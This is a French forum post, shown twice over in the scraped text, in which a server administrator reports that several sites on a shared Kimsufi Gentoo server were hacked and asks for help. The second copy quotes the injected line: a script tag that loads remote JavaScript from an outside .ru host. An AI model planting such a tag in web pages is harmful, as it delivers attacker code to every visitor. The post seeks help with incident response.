bonjour,
j'ai plusieurs sites hébergés sur le meme serveur kimsufi gentoo et hier j'ai constaté qu'un des sites a été hacké.
Plus exactement, sur certaines pages, un script a été ajouté en fin de fichier afin d'exécuter un script externe.
Le code ressemble à ça:
Et je viens de me rendre compte qu'il ne s'agit pas que d'un seul site, mais plusieurs autres qui sont sur le meme serveur.
Je demande de l'aide, si qqn peut m'aider.
J'ai déja modifié les pages infectés et changer les chmod en 404 et 505 (dossier).
Je me demande si c'est juste un piratage ou est ce que mon serveur a un virus qui traine. Que faire?
Merci
j'ai plusieurs sites hébergés sur le meme serveur kimsufi gentoo et hier j'ai constaté qu'un des sites a été hacké.
Plus exactement, sur certaines pages, un script a été ajouté en fin de fichier afin d'exécuter un script externe.
Le code ressemble à ça:
<script type="text/javascript" src="http://obscurewax.ru/FAQ.js"></script>
<!--72628eb2e686638651ad69b6a34a630f-->
Et je viens de me rendre compte qu'il ne s'agit pas que d'un seul site, mais plusieurs autres qui sont sur le meme serveur.
Je demande de l'aide, si qqn peut m'aider.
J'ai déja modifié les pages infectés et changer les chmod en 404 et 505 (dossier).
Je me demande si c'est juste un piratage ou est ce que mon serveur a un virus qui traine. Que faire?
Merci